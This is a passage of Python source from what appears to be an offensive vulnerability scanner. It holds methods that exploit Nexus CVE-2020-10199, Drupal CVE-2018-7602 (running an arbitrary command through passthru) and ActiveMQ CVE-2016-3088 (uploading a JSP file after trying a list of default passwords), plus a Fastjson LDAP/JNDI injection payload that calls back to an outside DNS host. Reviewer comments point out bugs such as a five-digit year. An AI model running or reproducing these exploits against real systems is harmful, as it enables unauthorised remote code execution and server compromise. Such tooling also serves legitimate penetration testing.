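                self.vul_info["prt_info"] = "[JMXInvokerServlet] [upload: " + self.url + "/jexinv4/jexinv4.jsp?ppp=whoami ]"
        verify.scan_print(self.vul_info)
    except requests.exceptions.Timeout:
        verify.timeout_print(self.vul_info["prt_name"])
    except requests.exceptions.ConnectionError:
        verify.connection_print(self.vul_info["prt_name"])
    except Exception:
        verify.error_print(self.vul_info["prt_name"])
    finally:
        self.threadLock.release()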
def cve_2020_10199_poc(self) -> None:
    """Probe a Nexus Repository Manager 3 host for CVE-2020-10199.

    Fills ``self.vul_info`` with the static record for this check, logs in at
    ``/service/rapture/session`` with the fixed credentials ``admin:admin``
    (base64-encoded form fields), extracts the ``NXSESSIONID`` cookie from the
    response headers, then posts ``self.payload_cve_2020_10199`` (defined
    elsewhere) to ``/service/rest/beta/repositories/go/group`` with an
    ``echo <random marker>`` command carried in a request header named ``404``.
    A hit is recorded when the marker appears in the response body.

    Reads: self.url, self.ua, self.payload_cve_2020_10199, self.threadLock.
    Writes: self.vul_info, self.session_headers, self.us, self.pa,
    self.base64user, self.base64pass, self.session_data, self.request,
    self.session_str, self.session, self.rce_headers. Returns nothing.
    """
    self.threadLock.acquire()
    self.vul_info["prt_name"] = "Nexus Repository Manager: CVE-2020-10199"
    self.vul_info["prt_resu"] = "null"
    self.vul_info["prt_info"] = "null"
    self.vul_info["vul_urls"] = self.url
    self.vul_info["vul_payd"] = "null"
    self.vul_info["vul_name"] = "Nexus Repository Manager 3 远程代码执行漏洞"
    self.vul_info["vul_numb"] = "CVE-2020-10199"
    self.vul_info["vul_apps"] = "Nexus"
    # NOTE(review): five-digit year; almost certainly meant "2020-04-01".
    self.vul_info["vul_date"] = "20120-04-01"
    self.vul_info["vul_vers"] = "3.x <= 3.21.1"
    self.vul_info["vul_risk"] = "high"
    self.vul_info["vul_type"] = "远程代码执行漏洞"
    self.vul_info["vul_data"] = "null"
    self.vul_info["vul_desc"] = "在 Nexus Repository Manager OSS/Pro 3.21.1 及之前的版本中,由于某处功能安全处理不当," \
                                "导致经过授权认证的攻击者,可以在远程通过构造恶意的 HTTP 请求,在服务端执行任意恶意代码,获取系统权限。 "
    self.vul_info["cre_date"] = "2021-01-27"
    self.vul_info["cre_auth"] = "zhzyker"
    self.session_headers = {
        'Connection': 'keep-alive',
        'X-Requested-With': 'XMLHttpRequest',
        'X-Nexus-UI': 'true',
        'User-Agent': self.ua
    }
    md = random_md5()
    cmd = "echo " + md
    try:
        # The check only works against the default admin:admin account; any
        # other credential set means the login below fails and the regex
        # search raises AttributeError, which lands in the generic handler.
        self.us = base64.b64encode(str.encode("admin"))
        self.pa = base64.b64encode(str.encode("admin"))
        self.base64user = self.us.decode('ascii')
        self.base64pass = self.pa.decode('ascii')
        self.session_data = {
            'username': self.base64user,
            'password': self.base64pass
        }
        # NOTE(review): hard-coded timeout=20 instead of self.timeout, and no
        # verify=False unlike the other probes in this file.
        self.request = requests.post(self.url + "/service/rapture/session", data=self.session_data, headers=self.session_headers, timeout=20)
        # Pull the session id out of the stringified header dict.
        # NOTE(review): greedy `(.*)` may over-capture if several cookies are
        # present before "; Path".
        self.session_str = str(self.request.headers)
        self.session = (re.search(r"NXSESSIONID=(.*); Path", self.session_str).group(1))
        self.rce_headers = {
            'Connection': "keep-alive",
            'NX-ANTI-CSRF-TOKEN': "0.6153568974227819",
            'X-Requested-With': "XMLHttpRequest",
            'X-Nexus-UI': "true",
            'Content-Type': "application/json",
            # The command is passed in a header named "404"; presumably the
            # payload body references that header — confirm against payload.
            '404': "" + cmd + "",
            'User-Agent': self.ua,
            'Cookie': "jenkins-timestamper-offset=-28800000; Hm_lvt_8346bb07e7843cd10a2ee33017b3d627=1583249520;" \
                      "NX-ANTI-CSRF-TOKEN=0.6153568974227819; NXSESSIONID=" + self.session + ""
        }
        # NOTE(review): no timeout on this request, so it can block a worker
        # thread indefinitely while holding self.threadLock.
        request = requests.post(self.url + "/service/rest/beta/repositories/go/group", data=self.payload_cve_2020_10199, headers=self.rce_headers)
        if md in request.text:
            self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
            self.vul_info["prt_resu"] = "PoCSuCCeSS"
            self.vul_info["vul_payd"] = cmd
            self.vul_info["prt_info"] = "[rce] [admin:admin] [payload: " + cmd + " ]"
        verify.scan_print(self.vul_info)
    except requests.exceptions.Timeout:
        verify.timeout_print(self.vul_info["prt_name"])
    except requests.exceptions.ConnectionError:
        verify.connection_print(self.vul_info["prt_name"])
    except Exception as e:
        # NOTE(review): `e` is unused; a failed login is indistinguishable from
        # any other error in the output.
        verify.error_print(self.vul_info["prt_name"])
    # NOTE(review): not in a `finally`; see the other *_poc methods.
    self.threadLock.release()
def cve_2018_7602_exp(self, cmd: str) -> None:
    """Run ``cmd`` on a Drupal host via CVE-2018-7602 and print the response.

    Logs in with the fixed credentials ``admin:admin`` using a
    ``requests.Session``, reads the user id from the ``foaf:name`` meta tag,
    fetches the account-cancel form to obtain ``form_token``, submits the form
    with a ``destination`` parameter that embeds ``cmd``, reads back
    ``form_build_id``, and finally posts to the ``file/ajax`` callback path.
    The last response is dumped with ``dump.dump_all`` and shown through
    ``verify.exploit_print``. Transport errors are reported and swallowed.

    Args:
        cmd: command string appended verbatim to the ``destination`` parameter.

    Reads: self.url, self.headers, self.timeout. Writes: self.session,
    self.get_params, self.post_params, self.r, self.soup, self.user_id,
    self.form, self.form_token, self.form_build_id, self.raw_data.
    """
    vul_name = "Drupal: CVE-2018-7602"
    # Only the default admin account is tried; there is no credential parameter.
    DRUPAL_U = "admin"
    DRUPAL_P = "admin"
    try:
        # NOTE(review): the Session is never closed (no `with`/`close()`), so
        # its connection pool lives until garbage collection.
        self.session = requests.Session()
        self.get_params = {'q': 'user/login'}
        self.post_params = {
            'form_id': 'user_login',
            'name': DRUPAL_U,
            'pass': DRUPAL_P,
            'op': 'Log in'
        }
        self.session.post(self.url, params=self.get_params, data=self.post_params, headers=self.headers, timeout=self.timeout, verify=False)
        self.get_params = {'q': 'user'}
        self.r = self.session.get(self.url, params=self.get_params, headers=self.headers, timeout=self.timeout, verify=False)
        self.soup = BeautifulSoup(self.r.text, "html.parser")
        # If the login failed the meta tag is absent, find() returns None and
        # the .get() raises AttributeError -> generic error_print below.
        self.user_id = self.soup.find('meta', {
            'property': 'foaf:name'
        }).get('about')
        # Non-clean-URL installs expose the id as "?q=user/N"; clean-URL ones
        # presumably give a plain path, which is used as-is — confirm.
        if "?q=" in self.user_id:
            self.user_id = self.user_id.split("=")[1]
        self.get_params = {'q': self.user_id + '/cancel'}
        self.r = self.session.get(self.url, params=self.get_params, headers=self.headers, timeout=self.timeout, verify=False)
        self.soup = BeautifulSoup(self.r.text, "html.parser")
        self.form = self.soup.find('form', {'id': 'user-cancel-confirm-form'})
        self.form_token = self.form.find('input', {
            'name': 'form_token'
        }).get('value')
        self.get_params = {
            'q': self.user_id + '/cancel',
            'destination': self.user_id + '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]=' + cmd
        }
        self.post_params = {
            'form_id': 'user_cancel_confirm_form',
            'form_token': self.form_token,
            '_triggering_element_name': 'form_id',
            'op': 'Cancel account'
        }
        self.r = self.session.post(self.url, params=self.get_params, data=self.post_params, headers=self.headers, timeout=self.timeout, verify=False)
        self.soup = BeautifulSoup(self.r.text, "html.parser")
        self.form = self.soup.find('form', {'id': 'user-cancel-confirm-form'})
        self.form_build_id = self.form.find('input', {
            'name': 'form_build_id'
        }).get('value')
        self.get_params = {
            'q': 'file/ajax/actions/cancel/#options/path/' + self.form_build_id
        }
        self.post_params = {'form_build_id': self.form_build_id}
        self.r = self.session.post(self.url, params=self.get_params, data=self.post_params, headers=self.headers, timeout=self.timeout, verify=False)
        self.raw_data = dump.dump_all(self.r).decode('utf-8', 'ignore')
        verify.exploit_print(self.r.text, self.raw_data)
    except requests.exceptions.Timeout:
        verify.timeout_print(vul_name)
    except requests.exceptions.ConnectionError:
        verify.connection_print(vul_name)
    except Exception:
        # Covers the AttributeError cases above (missing meta/form/input);
        # the cause is not surfaced to the user.
        verify.error_print(vul_name)
def cve_2016_3088_poc(self) -> None:
    """Probe an Apache ActiveMQ host for CVE-2016-3088 (fileserver PUT/MOVE).

    Fills ``self.vul_info`` with the static record for this check, tries a
    short list of default ``admin`` passwords against
    ``/admin/test/systemProperties.jsp`` to read ``activemq.home``, uploads a
    random marker to ``/fileserver/v.txt`` with PUT, issues a MOVE whose
    ``Destination`` points at ``<activemq.home>/webapps/api/<random>.jsp``, and
    then requests ``/api/<random>.jsp``. A hit is recorded when the marker is
    served back. Note that the probe leaves the moved file on the host; nothing
    here removes it.

    Reads: self.url, self.ua, self.timeout, self.jsp_webshell, self.threadLock.
    Writes: self.vul_info, self.rawdata, self.path, self.name, self.webshell,
    self.poc, self.exp, self.passlist, self.pa, self.base64_p, self.p,
    self.headers_base64, self.request, self.headers_move. Returns nothing.
    """
    self.threadLock.acquire()
    self.vul_info["prt_name"] = "Apache AcitveMQ: CVE-2016-3088"
    self.vul_info["prt_resu"] = "null"
    self.vul_info["prt_info"] = "null"
    self.vul_info["vul_urls"] = self.url
    self.vul_info["vul_payd"] = "null"
    self.vul_info["vul_name"] = "Apache ActiveMQ 远程代码执行漏洞"
    self.vul_info["vul_numb"] = "CVE-2016-3088"
    # NOTE(review): "AcitveMQ" is misspelled here and in prt_name above.
    self.vul_info["vul_apps"] = "AcitveMQ"
    self.vul_info["vul_date"] = "2016-03-10"
    self.vul_info["vul_vers"] = "< 5.14.0"
    self.vul_info["vul_risk"] = "high"
    self.vul_info["vul_type"] = "远程代码执行漏洞"
    self.vul_info["vul_data"] = "null"
    self.vul_info["vul_desc"] = "ActiveMQ 中的 FileServer 服务允许用户通过 HTTP PUT 方法上传文件到指定目录"
    self.vul_info["cre_date"] = "2021-01-07"
    self.vul_info["cre_auth"] = "zhzyker"
    # NOTE(review): self.rawdata is set but never read in this method.
    self.rawdata = None
    # "null" is the sentinel for "activemq.home not found"; it is still
    # interpolated into the MOVE Destination below if no credential works.
    self.path = "null"
    # Keeps the leading part of the random hex (32 - 20 = 12 chars, assuming
    # random_md5() returns a 32-char digest — confirm).
    self.name = random_md5()[:-20]
    self.webshell = "/" + self.name + ".jsp"
    # Marker uploaded as the file body; only this value is checked later.
    self.poc = random_md5()
    # NOTE(review): self.exp is assigned but never used; the uploaded body is
    # self.poc, not the jsp_webshell content.
    self.exp = self.jsp_webshell
    self.passlist = [
        "admin:123456", "admin:admin", "admin:123123", "admin:activemq", "admin:12345678"
    ]
    try:
        try:
            for self.pa in self.passlist:
                self.base64_p = base64.b64encode(str.encode(self.pa))
                self.p = self.base64_p.decode('utf-8')
                self.headers_base64 = {
                    'User-Agent': self.ua,
                    'Authorization': 'Basic ' + self.p
                }
                self.request = requests.get(
                    self.url + "/admin/test/systemProperties.jsp",
                    headers=self.headers_base64, timeout=self.timeout, verify=False)
                if self.request.status_code == 200:
                    # [0] raises IndexError when the page has no activemq.home
                    # row; the handler is outside the loop, so that aborts the
                    # whole credential sweep instead of trying the next entry.
                    self.path = \
                        re.findall('<td class="label">activemq.home</td>.*?<td>(.*?)</td>', self.request.text, re.S)[0]
                    break
        except IndexError:
            pass
        # headers_base64 holds whichever credential was tried last, whether or
        # not it was accepted.
        self.request = requests.put(self.url + "/fileserver/v.txt", headers=self.headers_base64, data=self.poc, timeout=self.timeout, verify=False)
        self.headers_move = {
            'User-Agent': self.ua,
            'Destination': 'file://' + self.path + '/webapps/api' + self.webshell
        }
        self.request = requests.request("MOVE", self.url + "/fileserver/v.txt", headers=self.headers_move, timeout=self.timeout, verify=False)
        self.request = requests.get(self.url + "/api" + self.webshell, headers=self.headers_base64, timeout=self.timeout, verify=False)
        if self.poc in self.request.text:
            self.vul_info["vul_data"] = dump.dump_all(self.request).decode('utf-8', 'ignore')
            self.vul_info["prt_resu"] = "PoCSuCCeSS"
            self.vul_info["vul_payd"] = 'file://' + self.path + '/webapps/api' + self.webshell
            self.vul_info["prt_info"] = "[upload: " + self.url + "/api" + self.webshell + " ] [" + self.pa + "]"
            verify.scan_print(self.vul_info)
        else:
            verify.scan_print(self.vul_info)
    except requests.exceptions.Timeout:
        verify.timeout_print(self.vul_info["prt_name"])
    except requests.exceptions.ConnectionError:
        verify.connection_print(self.vul_info["prt_name"])
    except Exception as e:
        # NOTE(review): `e` is unused.
        verify.error_print(self.vul_info["prt_name"])
    # NOTE(review): not in a `finally`; see the other *_poc methods.
    self.threadLock.release()
def fastjson_1247_poc(self) -> None:
    """Probe for the Fastjson <= 1.2.47 autotype bypass via an out-of-band DNS hit.

    Fills ``self.vul_info`` with the static record for this check, obtains a
    callback name from ``dns_request()`` (defined elsewhere), posts a JSON body
    that references ``com.sun.rowset.JdbcRowSetImpl`` with an ``ldap://`` data
    source pointing at that name, and then asks ``dns_result()`` whether the
    name was resolved. The HTTP exchange itself is best-effort: any error in it
    is ignored and the decision rests solely on the DNS lookup result.

    Reads: self.url, self.ua, self.timeout, self.threadLock.
    Writes: self.vul_info. Returns nothing.
    """
    self.threadLock.acquire()
    self.vul_info["prt_name"] = "Fastjson: 1.2.47"
    self.vul_info["prt_resu"] = "null"
    self.vul_info["prt_info"] = "null"
    self.vul_info["vul_payd"] = "null"
    self.vul_info["vul_urls"] = self.url
    self.vul_info["vul_name"] = "Fastjson 反序列化远程代码执行漏洞"
    self.vul_info["vul_numb"] = "null"
    self.vul_info["vul_apps"] = "Fastjson"
    self.vul_info["vul_date"] = "2019-07-15"
    self.vul_info["vul_vers"] = "<= 1.2.47"
    self.vul_info["vul_risk"] = "high"
    self.vul_info["vul_type"] = "远程代码执行"
    self.vul_info["vul_data"] = "null"
    self.vul_info["vul_desc"] = "Fastjson 1.2.47及以下版本中,利用其缓存机制可实现对未开启autotype功能的绕过。"
    self.vul_info["cre_date"] = "2021-01-20"
    self.vul_info["cre_auth"] = "zhzyker"
    headers = {
        'User-Agent': self.ua,
        'Content-Type': "application/json",
        'Connection': 'close'
    }
    # dns_request() presumably returns a unique hostname on a DNS-logging
    # service; dns_result(md) is later queried with the same value — confirm.
    md = dns_request()
    dns = md
    data = {
        "a": {
            "@type": "java.lang.Class",
            "val": "com.sun.rowset.JdbcRowSetImpl"
        },
        "b": {
            "@type": "com.sun.rowset.JdbcRowSetImpl",
            "dataSourceName": "ldap://" + dns + "//Exploit",
            "autoCommit": True
        }
    }
    data = json.dumps(data)
    try:
        try:
            request = requests.post(self.url, data=data, headers=headers, timeout=self.timeout, verify=False)
            self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
        except:
            # NOTE(review): bare except also swallows KeyboardInterrupt /
            # SystemExit; `except Exception` would be the safer spelling. It also
            # means the Timeout/ConnectionError handlers below never fire for
            # this request.
            pass
        if dns_result(md):
            # NOTE(review): trailing "] " looks like a copy of the prt_info
            # format and is probably unintended in vul_payd.
            self.vul_info["vul_payd"] = "ldap://" + dns + "//Exploit] "
            self.vul_info["prt_resu"] = "PoCSuCCeSS"
            self.vul_info["prt_info"] = "[dns] [payload: ldap://" + dns + "//Exploit] "
            verify.scan_print(self.vul_info)
        else:
            verify.scan_print(self.vul_info)
    except requests.exceptions.Timeout:
        verify.timeout_print(self.vul_info["prt_name"])
    except requests.exceptions.ConnectionError:
        verify.connection_print(self.vul_info["prt_name"])
    except Exception as e:
        # NOTE(review): `e` is unused.
        verify.error_print(self.vul_info["prt_name"])
    # NOTE(review): not in a `finally`; see the other *_poc methods.
    self.threadLock.release()